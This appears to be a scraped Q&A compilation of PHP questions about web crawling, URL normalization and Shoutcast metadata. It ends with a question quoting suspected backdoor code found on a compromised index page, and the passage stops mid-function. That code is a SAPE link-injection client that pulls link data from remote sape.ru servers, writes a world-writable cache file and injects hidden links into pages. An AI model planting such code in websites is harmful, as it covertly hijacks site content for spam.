PHP go after each link in page and links on links

PHP go after each link in page and links on links - php

I have a a function which return links from a given page using regular expression in php,
Now I want to go after each link in found link and so on....
Here is the code I have
function getLinks($url){
$content = file_get_contents($url);
preg_match_all("|<a [^>]+>(.*)</[^>]+>|U", $content, $links, PREG_PATTERN_ORDER);
$l_clean = array();
foreach($links[0] as $link){
$e_link = explode("href",$link);
$e_link = explode("\"",$e_link[1]);
$f_link = $e_link[1];
if( (substr($f_link,0,strlen('javascript:;')) != "javascript:;")){
$sperator = "";
$first = substr($f_link,0,1);
if($first != "/"){
$f_link = "/$f_link";
}
if(substr($f_link,0,7) != "http://"){
$f_link = "http://" . $sperator . $_SERVER['HTTP_HOST'] . $f_link;
}
$f_link = str_replace("///","//",$f_link);
if(!in_array($f_link, $l_clean)){
array_push($l_clean , $f_link);
}
}
}
}

Just do it recursively, and set a depth to terminate:
function getLinks($url, $depth){
if( --$depth <= 0 ) return;
$content = file_get_contents($url);
preg_match_all("|<a [^>]+>(.*)</[^>]+>|U", $content, $links, PREG_PATTERN_ORDER);
$l_clean = array();
foreach($links[0] as $link){
$e_link = explode("href",$link);
$e_link = explode("\"",$e_link[1]);
$f_link = $e_link[1];
if( (substr($f_link,0,strlen('javascript:;')) != "javascript:;")){
$sperator = "";
$first = substr($f_link,0,1);
if($first != "/"){
$f_link = "/$f_link";
}
if(substr($f_link,0,7) != "http://"){
$f_link = "http://" . $sperator . $_SERVER['HTTP_HOST'] . $f_link;
}
$f_link = str_replace("///","//",$f_link);
if(!in_array($f_link, $l_clean)){
array_push($l_clean , $f_link);
getLinks( $f_link, $depth );
}
}
}
}
$links = getLinks("http://myurl.com", 3);

Related

How to avoid url with mailto:

I'm working in php and I have created a function that is getting links from a submitted url.
The code is working fine, but it is picking even links that are not active like mailto:, , javascript:void(0).
How can I avoid picking up a tags whose href are like: href="mailto:" ; href="tel:"; href="javascript:"?
Thanks you in advance.
function check_all_links($url) {
$doc = new DOMDocument();
#$doc->loadHTML(file_get_contents($url));
$linklist = $doc->getElementsByTagName("a");
$title = $doc->getElementsByTagName("title");
$href = array();
$page_url = $full_url = $new_url = "";
$full_url = goodUrl($url);
$scheme = parse_url($url, PHP_URL_SCHEME);
$slash = '/';
$links = array();
$linkNo = array();
if ($scheme == "http") {
foreach ($linklist as $link) {
$href = strtolower($link->getAttribute('href'));
$page_url = parse_url($href, PHP_URL_PATH);
$new_url = $scheme."://".$full_url.'/'.ltrim($page_url, '/');
//check if href has mailto: or # or javascipt() or tel:
if (strpos($page_url, "tel:") === True) {
continue;
}
if(!in_array($new_url, $linkNo)) {
echo $new_url."<br>" ;
array_push($linkNo, $new_url);
$links[] = array('Links' => $new_url );
}
}
}else if ($scheme == "https") {
foreach ($linklist as $link) {
$href = strtolower($link->getAttribute('href'));
$page_url = parse_url($href, PHP_URL_PATH);
$new_url = $scheme."://".$full_url.'/'.ltrim($page_url, '/');
if (strpos($page_url, "tel:") === True) {
continue;
}
if(!in_array($new_url, $linkNo)) {
echo $new_url."<br>" ;
array_push($linkNo, $new_url);
$links[] = array('Links' => $new_url );
}
}
}

You can use the scheme field from the parse_url function result.
Instead of:
if (strpos($page_url, "tel:") === True) {
continue;
}
you can use:
if (isset($page_url["scheme"] && in_array($page_url["scheme"], ["mailto", "tel", "javascript"]) {
continue;
}

Function inside an array php

So I have a web crawler that I am working on. And I have a CSV file that have about one million websites that I want to pass to be crawled. My problem is that I am able to save the CSV file in an array but when I pass it to the method that crawls it; it seems that it takes the first element and crawls it not the whole array. Can someone help me?
<?php
include("classes/DomDocumentParser.php");
include("config.php");
$alreadyCrawled = array();
$crawling = array();
$alreadyFoundImages = array();
$my_list = array();
function linkExists($url){
global $con;
$query = $con->prepare("SELECT * FROM sites WHERE url = :url");
$query ->bindParam(":url",$url);
$query->execute();
return $query->rowCount() != 0;
}
function insertImage($url,$src,$title,$alt){
global $con;
$query = $con->prepare("INSERT INTO images(siteUrl, imageUrl, alt, title)
VALUES(:siteUrl,:imageUrl,:alt,:title)");
$query ->bindParam(":siteUrl",$url);
$query ->bindParam(":imageUrl",$src);
$query ->bindParam(":alt",$alt);
$query ->bindParam(":title",$title);
return $query->execute();
}
function insertLink($url,$title,$description,$keywords){
global $con;
$query = $con->prepare("INSERT INTO sites(Url, title, description, keywords)
VALUES(:url,:title,:description,:keywords)");
$query ->bindParam(":url",$url);
$query ->bindParam(":title",$title);
$query ->bindParam(":description",$description);
$query ->bindParam(":keywords",$keywords);
return $query->execute();
}
function createLink($src,$url){
$scheme = parse_url($url)["scheme"]; // http or https
$host = parse_url($url)["host"]; // www.mohamad-ahmad.com
if(substr($src,0,2) =="//"){
// //www.mohanadahmad.com
$src = $scheme . ":" . $src;
}
else if(substr($src,0,1) =="/"){
// /aboutus/about.php
$src = $scheme . "://" . $host . $src;
}
else if(substr($src,0,2) =="./"){
// ./aboutus/about.php
$src = $scheme . "://" . $host . dirname(parse_url($url)["path"]) . substr($src ,1);
}
else if(substr($src,0,3) =="../"){
// ../aboutus/about.php
$src = $scheme . "://" . $host . "/" . $src;
}
else if(substr($src,0,5) !="https" && substr($src,0,4) !="http" ){
// aboutus/about.php
$src = $scheme . "://" . $host ."/" .$src;
}
return $src;
}
function getDetails($url){
global $alreadyFoundImages;
$parser = new DomDocumentParser($url);
$titleArray = $parser->getTitletags();
if(sizeof($titleArray) == 0 || $titleArray->item(0) == NULL){
return;
}
$title = $titleArray -> item(0) -> nodeValue;
$title = str_replace("\n","",$title);
if($title == ""){
return;
}
$description="";
$keywords="";
$metasArray = $parser -> getMetatags();
foreach($metasArray as $meta){
if($meta->getAttribute("name") == "description"){
$description = $meta -> getAttribute("content");
}
if($meta->getAttribute("name") == "keywords"){
$keywords = $meta -> getAttribute("content");
}
}
$description = str_replace("\n","",$description);
$keywords = str_replace("\n","",$keywords);
if(linkExists($url)){
echo "$url already exists <br>";
}
else if(insertLink($url,$title,$description,$keywords)){
echo "SUCCESS: $url <br>";
}
else{
echo "ERROR: Failed to insert $url <br>";
}
$imageArray = $parser ->getImages();
foreach($imageArray as $image){
$src = $image->getAttribute("src");
$alt = $image->getAttribute("alt");
$title = $image->getAttribute("title");
if(!$title && !$alt){
continue;
}
$src = createLink($src,$url);
if(!in_array($src,$alreadyFoundImages)){
$alreadyFoundImages[] = $src;
insertImage($url,$src,$alt,$title);
}
}
}
function followLinks($url) {
global $crawling;
global $alreadyCrawled;
$parser = new DomDocumentParser($url);
$linkList = $parser->getLinks();
foreach($linkList as $link){
$href = $link->getAttribute("href");
if(strpos($href,"#") !==false){
// Ignore anchor url
continue;
}
else if(substr($href,0,11)== "javascript:"){
// Ignore javascript url
continue;
}
$href = createLink($href,$url);
if(!in_array($href,$alreadyCrawled)){
$alreadyCrawled[] = $href;
$crawling[] = $href;
//getDetails contain the insert into db
getDetails($href);
}
}
array_shift($crawling);
foreach($crawling as $site){
followLinks($site);
}
}
function fill_my_list(){
global $my_list;
$file = fopen('top-1m.csv', 'r');
while( ($data = fgetcsv($file)) !== false ) {
$startUrl = "https://www.".$data[1];
$my_list[] = $startUrl;
}
foreach($my_list as $key => $u){
followLinks($u);
}
}
fill_my_list();
?>

You can do something like this by php.net
$row = 1;
if (($File = fopen("test.csv", "r")) !== FALSE) {
while (($data = fgetcsv($File, 1000, ",")) !== FALSE) {
$num = count($data);
echo "<p> $num fields in line $row: <br /></p>\n";
$row++;
for ($c=0; $c < $num; $c++) {
echo $data[$c] . "<br />\n";
}
//Use $data[$c];
}
fclose($File);
}
Here more examples : https://www.php.net/manual/en/function.fgetcsv.php#refsect1-function.fgetcsv-examples

php convert absolute URL containing relative paths in absolute url without relative path

I have a simple strange problem but I can not find a function to do this after many search.
I have an URL like http://example.com/folder/folder2/../image/test.jpg and I would like a function which return the correct absolute link:
http://example.com/folder/image/test.jpg
A function with only one param, the url (and not base dir or relative dir like in examples I found)
If you can help me, thanks.

Perhaps a starting point:
<?php
function unrelatify($url)
{
$parts = parse_url($url);
$path = $parts['path'] ?? '';
$hierarchy = explode('/', $path);
while(($key = array_search('..', $hierarchy)) !== false) {
if($key-1 > 0)
unset($hierarchy[$key-1]);
unset($hierarchy[$key]);
$hierarchy = array_values($hierarchy);
}
$new_path = implode('/', $hierarchy);
return str_replace($path, $new_path, $url);
}
echo unrelatify('http://example.com/../folder/../folder2/../image/test.jpg#foo?bar=baz');
Output:
http://example.com/image/test.jpg#foo?bar=baz
You may want to see how browsers and other web clients de-relativify (urls).

thanks to everyone for your answers.
here are a recap and some other ways i've tested
<?php
function unrelatify($url) {
$parts = parse_url($url);
$path = $parts['path'];
$hierarchy = explode('/', $path);
while (($key = array_search('..', $hierarchy)) !== false) {
if ($key - 1 > 0)
unset($hierarchy[$key - 1]);
unset($hierarchy[$key]);
$hierarchy = array_values($hierarchy);
}
$new_path = implode('/', $hierarchy);
return str_replace($path, $new_path, $url);
}
function normalizePath($path) {
do {
$path = preg_replace(
array('#//|/\./#', '#/([^/.]+)/\.\./#'), '/', $path, -1, $count
);
} while ($count > 0);
return str_replace('../', '', $path);
}
function processUrl($url) {
$parsedUrl = parse_url($url);
$path = $parsedUrl['path'];
$pathSegments = explode("/", $path);
$iterator = 0;
$removedElements = 0;
foreach ($pathSegments as $segment) {
if ($segment == "..") {
if ($iterator - $removedElements - 1 < 0) {
return false;
}
unset($pathSegments[$iterator - $removedElements - 1]);
unset($pathSegments[$iterator]);
$removedElements += 2;
}
$iterator++;
}
$parsedUrl['path'] = implode("/", $pathSegments);
$newUrl = $parsedUrl['scheme'] . '://' . $parsedUrl['host'] . "/" . $parsedUrl['path'];
return $newUrl;
}
function path_normalize($path) {
$path = str_replace('\\', '/', $path);
$blocks = preg_split('#/#', $path, null, PREG_SPLIT_NO_EMPTY);
$res = array();
while (list($k, $block) = each($blocks)) {
switch ($block) {
case '.':
if ($k == 0)
$res = explode('/', path_normalize(getcwd()));
break;
case '..';
if (!$res)
return false;
array_pop($res);
break;
default:
$res[] = $block;
break;
}
}
$r = implode('/', $res);
return $r;
}
echo 'path_normalize<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . path_normalize($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . path_normalize($url);
echo '<hr />normalizePath<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . normalizePath($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . normalizePath($url);
echo '<hr />unrelatify<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . unrelatify($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . unrelatify($url);
echo '<hr />processUrl<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . processUrl($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . processUrl($url);
?>

PHP script to extract artist & title from Shoutcast/Icecast stream

I found a script which can extract the artist & title name from an Icecast or Shoutcast stream.
I want the script to update automatically when a song changed, at the moment its working only when i execute it. I'm new to PHP so any help will be appreciated.
Thanks!
define('CRLF', "\r\n");
class streaminfo{
public $valid = false;
public $useragent = 'Winamp 2.81';
protected $headers = array();
protected $metadata = array();
public function __construct($location){
$errno = $errstr = '';
$t = parse_url($location);
$sock = fsockopen($t['host'], $t['port'], $errno, $errstr, 5);
$path = isset($t['path'])?$t['path']:'/';
if ($sock){
$request = 'GET '.$path.' HTTP/1.0' . CRLF .
'Host: ' . $t['host'] . CRLF .
'Connection: Close' . CRLF .
'User-Agent: ' . $this->useragent . CRLF .
'Accept: */*' . CRLF .
'icy-metadata: 1'.CRLF.
'icy-prebuffer: 65536'.CRLF.
(isset($t['user'])?'Authorization: Basic '.base64_encode($t['user'].':'.$t['pass']).CRLF:'').
'X-TipOfTheDay: Winamp "Classic" rulez all of them.' . CRLF . CRLF;
if (fwrite($sock, $request)){
$theaders = $line = '';
while (!feof($sock)){
$line = fgets($sock, 4096);
if('' == trim($line)){
break;
}
$theaders .= $line;
}
$theaders = explode(CRLF, $theaders);
foreach ($theaders as $header){
$t = explode(':', $header);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode(':', $t));
if ($value != ''){
if (is_numeric($value)){
$this->headers[$name] = (int)$value;
}else{
$this->headers[$name] = $value;
}
}
}
}
if (!isset($this->headers['icymetaint'])){
$data = ''; $metainterval = 512;
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
$this->print_data($data);
$matches = array();
preg_match_all('/([\x00-\xff]{2})\x0\x0([a-z]+)=/i', $data, $matches, PREG_OFFSET_CAPTURE);
preg_match_all('/([a-z]+)=([a-z0-9\(\)\[\]., ]+)/i', $data, $matches, PREG_SPLIT_NO_EMPTY);
echo '<pre>';var_dump($matches);echo '</pre>';
$title = $artist = '';
foreach ($matches[0] as $nr => $values){
$offset = $values[1];
$length = ord($values[0]{0}) +
(ord($values[0]{1}) * 256)+
(ord($values[0]{2}) * 256*256)+
(ord($values[0]{3}) * 256*256*256);
$info = substr($data, $offset + 4, $length);
$seperator = strpos($info, '=');
$this->metadata[substr($info, 0, $seperator)] = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'title') $title = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'artist') $artist = substr($info, $seperator + 1);
}
$this->metadata['streamtitle'] = $artist . ' - ' . $title;
}else{
$metainterval = $this->headers['icymetaint'];
$intervals = 0;
$metadata = '';
while(1){
$data = '';
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
//$this->print_data($data);
$len = join(unpack('c', fgetc($sock))) * 16;
if ($len > 0){
$metadata = str_replace("\0", '', fread($sock, $len));
break;
}else{
$intervals++;
if ($intervals > 100) break;
}
}
$metarr = explode(';', $metadata);
foreach ($metarr as $meta){
$t = explode('=', $meta);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode('=', $t));
if (substr($value, 0, 1) == '"' || substr($value, 0, 1) == "'"){
$value = substr($value, 1);
}
if (substr($value, -1) == '"' || substr($value, -1) == "'"){
$value = substr($value, 0, -1);
}
if ($value != ''){
$this->metadata[$name] = $value;
}
}
}
}
fclose($sock);
$this->valid = true;
}else echo 'unable to write.';
}else echo 'no socket '.$errno.' - '.$errstr.'.';
}
public function print_data($data){
$data = str_split($data);
$c = 0;
$string = '';
echo "<pre>\n000000 ";
foreach ($data as $char){
$string .= addcslashes($char, "\n\r\0\t");
$hex = dechex(join(unpack('C', $char)));
if ($c % 4 == 0) echo ' ';
if ($c % (4*4) == 0 && $c != 0){
foreach (str_split($string) as $s){
//echo " $string\n";
if (ord($s) < 32 || ord($s) > 126){
echo '\\'.ord($s);
}else{
echo $s;
}
}
echo "\n";
$string = '';
echo str_pad($c, 6, '0', STR_PAD_LEFT).' ';
}
if (strlen($hex) < 1) $hex = '00';
if (strlen($hex) < 2) $hex = '0'.$hex;
echo $hex.' ';
$c++;
}
echo " $string\n</pre>";
}
public function __get($name){
if (isset($this->metadata[$name])){
return $this->metadata[$name];
}
if (isset($this->headers[$name])){
return $this->headers[$name];
}
return null;
}
}
$t = new streaminfo('http://64.236.34.196:80/stream/1014'); // get metadata
echo Meta Interval: $t->icymetaint;
echo Current Track: $t->streamtitle;

You will need to constantly query the stream at a set interval to find when the song changes.
This can be best done by scheduling a cron job.
If on Windows, you should use the Windows Task Scheduler

If you want to run the PHP script to keep your meta data up to date (I'm assuming you're making a website and using html audio tags here) you can use the ontimeupdate event with an ajax function. If you're not you probably should look up your audio playback documentation for something similar.
<audio src="http://ip:port/;" ontimeupdate="loadXMLDoc()">
You can find a great example here http://www.w3schools.com/php/php_ajax_php.asp
You want to use the PHP echo function all the relevant information at once using one php variable at the very end of your script.
<?php ....
$phpVar=$streamtitle;
$phpVar2=$streamsong;
$result="I want my string to look like this: <br> {$phpVar} {$phpVar2}";
echo $result;
?>
and then use the function called by the .onreadystatechange to modify the particular elements you want on your website by using the .resonseText (this will contain the same content as your PHP script's echo).

After SCOURING the web for 4 hours, this is the only Shoutcast metadata script I've found that works! Thankyou.
To run this constantly, why not use a setInterval combined with jQuery's AJAX call?
<script>
$(function() {
setInterval(getTrackName,16000);
});
function getTrackName() {
$.ajax({
url: "track_name.php"
})
.done(function( data ) {
$( "#results" ).text( data );
});
}
</script>
Also your last couple 'echo' lines were breaking the script for me. Just put quotes around the Meta Interval, etc....

Hacker Backdoor script? [closed]

Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
I found this script attached to a modified index page. This looks like some kind of backdoor. and who is this SAPE ?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
$this->_host = $_SERVER['HTTP_HOST'];
}
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
return $this->raise_error('Не задана константа _SAPE_USER');
}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
$this->_request_uri = strtolower($this->_request_uri);
}
}
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
#ini_set('allow_url_fopen', 1);
#ini_set('default_socket_timeout', $this->_socket_timeout);
#ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
$this->_fetch_remote_type = 'file_get_contents';
if ($data = #file_get_contents('http://' . $host . $path)) {
return $data;
}
}
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = #curl_init()) {
#curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
#curl_setopt($ch, CURLOPT_HEADER, false);
#curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
#curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
#curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if ($data = #curl_exec($ch)) {
return $data;
}
#curl_close($ch);
}
}
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = #fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
#fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
#fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!#feof($fp)) {
$buff .= #fgets($fp, 128);
}
#fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
function _read($filename) {
$fp = #fopen($filename, 'rb');
#flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = #filesize($filename);
$mqr = #get_magic_quotes_runtime();
#set_magic_quotes_runtime(0);
if ($length) {
$data = #fread($fp, $length);
}
else {
$data = '';
}
#set_magic_quotes_runtime($mqr);
#flock($fp, LOCK_UN);
#fclose($fp);
return $data;
}
return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}
function _write($filename, $data) {
$fp = #fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
#fwrite($fp, $data, $length);
#flock($fp, LOCK_UN);
#fclose($fp);
if (md5($this->_read($filename)) != md5($data)) {
#unlink($filename);
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}
}
else {
return false;
}
return true;
}
return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}
function raise_error($e) {
$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
if ($this->_verbose == true) {
print $this->_error;
}
return false;
}
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
if (#touch($this->_db_file)) {
#chmod($this->_db_file, 0666);
}
else {
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}
if (!is_writable($this->_db_file)) {
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}
#clearstatcache();
$data = $this->_read($this->_db_file);
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
#unserialize($data) == false
)
)
) {
#touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = #unserialize($data);
if ($hash != false) {
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = #serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(#unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
function SAPE_client($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = #iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.links.db';
}
else {
return dirname(__FILE__) . '/links.db';
}
}
function _get_dispenser_path() {
return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
if ($this->_ignore_case) {
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
if (#array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
function SAPE_context($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
foreach ($this->_words_page as $n => $sentence) {
//Заменяем все сущности на символы
$special_chars = array(
'&' => '&',
'"' => '"',
''' => '\'',
'<' => '<',
'>' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
str_replace($from, $to, $sentence);
}
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
$source_sentences[$n] = str_replace(' ', '((\s)|( ))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
$open_tags = array();
$close_tag = '';
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
foreach ($source_sentences as $n => $sentence) {
